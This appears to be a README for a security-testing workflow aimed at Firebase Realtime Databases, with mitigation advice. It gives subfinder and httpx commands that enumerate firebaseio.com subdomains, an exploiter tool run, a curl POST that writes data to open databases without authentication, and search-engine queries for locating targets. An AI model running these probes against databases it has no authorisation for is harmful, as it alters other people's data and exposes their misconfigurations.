This repository provides a workflow to find subdomains of firebaseio.com, test them for public accessibility, and exploit a .json endpoint to check for write vulnerabilities. Additionally, mitigation steps are provided to fix the issue.
Use subfinder to enumerate subdomains for firebaseio.com:
subfinder -d firebaseio.com -o subdomains.txtOnce subdomains are collected, use httpx to check .json endpoints for accessible responses (HTTP status code 200):
httpx -l subdomains.txt -path "/.json" -mc 200 -o valid_subdomains.txtfirebaseExploiter -file subdomains.txtUse curl to send a POST request to the .json endpoint to test if data can be written without authentication:
curl -X POST https://<subdomain>.firebaseio.com/.json -d '{"test":"poc"}' -H "Content-Type: application/json"If successful, the server is vulnerable to unauthenticated write access.
To secure the Firebase database:
-
Set Firebase Database Rules:
- Open the Firebase Console.
- Go to Database > Rules.
- Update the rules to restrict access only to authenticated users. Example:
{ "rules": { ".read": "auth != null", ".write": "auth != null" } }
-
Audit Subdomains:
- Ensure there are no unused or publicly misconfigured Firebase databases.
-
Monitor Activity Logs:
- Use Firebase to monitor access logs for suspicious activities.
-
FOFA:
Query:"domain="firebaseio.com"" -
Shodan:
Query:http.title:"Firebase"" -
ZoomEye:
Query:site:"firebaseio.com""
Here are real-world examples of Firebaseio vulnerabilities reported on HackerOne :
This script is intended for educational purposes and for security testing of systems you own or have explicit permission to test. Do not use this for unauthorized activities.
If you find this work helpful, you can support me:
Thanks for your support! ❤️